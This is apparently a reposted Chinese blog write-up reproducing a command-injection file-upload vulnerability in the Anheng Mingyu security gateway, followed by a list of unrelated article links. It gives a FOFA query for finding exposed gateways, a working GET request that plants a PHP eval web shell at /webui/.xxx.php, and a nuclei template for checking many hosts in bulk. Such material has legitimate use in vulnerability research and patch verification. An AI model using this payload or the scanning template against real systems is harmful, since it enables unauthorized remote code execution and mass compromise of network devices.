当前位置: 首页 > news >正文

漏洞复现--安恒明御安全网关文件上传

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

一:漏洞描述

安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品存在文件上传漏洞。

二:漏洞影响版本

安恒明御网关

三:网络空间测绘查询

fofa:
title=="明御安全网关"
image.png

四:漏洞复现

POC:
GET /webui/?$type=1&bkg_flag=0&g=aaa_portal_auth_local_submit&suffix=1|echo+%22%3C%3fphp+eval(\$_POST[\%22cmd\%22])?%3E%22+%3E+.xxx.php HTTP/1.1
在这里插入图片描述

image.png
如此页面便存在该漏洞。该POC已将一句话木马写入,名称为.xxx.php,路径在/webui/.xxx.php
蚁剑连接:
image.png

五:批量验证

nuclei:

id: mingyu_upload
info:name: mingyu_uploadauthor: joyboyseverity: criticaldescription: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.phpmetadata:max-request: 1fofa-query: title="明御安全网关"verified: trueCVE: tags: 明御安全网关,uploadfilerequests:- raw:- |GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1Host: {{Hostname}}matchers:- type: wordpart: bodywords:- 'success'

脚本来自揽月安全团队
image.png

http://www.lryc.cn/news/197004.html

相关文章:

  • 简单的对称加密
  • vue源码笔记之——响应系统
  • Android Studio Giraffe | 2022.3.1
  • Spring Boot 3.0 已经就绪,您准备好了么?
  • 5+非肿瘤分析,分型+WGCNA+机器学习筛选相关基因
  • 算法课作业2 OJ for Divide and Conquer
  • 申请全国400电话的步骤及注意事项
  • C++ 的设计模式之 工厂方法加单例
  • Deploy、Service与Ingress
  • 定制化推送+精细化运营,Mobpush助力《迷你世界》用户留存率提升23%
  • 深度学习零基础教程
  • 简单测试一下 展锐的 UDX710 性能
  • 一百九十、Hive——Hive刷新分区MSCK REPAIR TABLE
  • 智慧公厕:探索未来城市环境卫生设施建设新标杆
  • 高压放大器在无线电能中应用有哪些
  • 若依集成MybatisPlus
  • List小练习,实现添加图书,并且有序遍历
  • 代码随想录二刷 Day42
  • 【Android】Drawable 和src 的区别和理解
  • Linux网络-UDP/TCP协议详解
  • C语言从入门到高级
  • 【MultiOTP】在Linux上使用MultiOTP进行SSH登录
  • 性能超越 Clickhouse | 物联网场景中的毫秒级查询案例
  • 05、SpringBoot 集成 RocketMQ
  • PR2023中如何导入字幕
  • 读书笔记--华为数据之道有感
  • 汽车数据安全事件频发,用户如何保护隐私信息?
  • Redis主从复制流程
  • 微信公众号如何变更为订阅号?
  • 竞赛选题 深度学习YOLO抽烟行为检测 - python opencv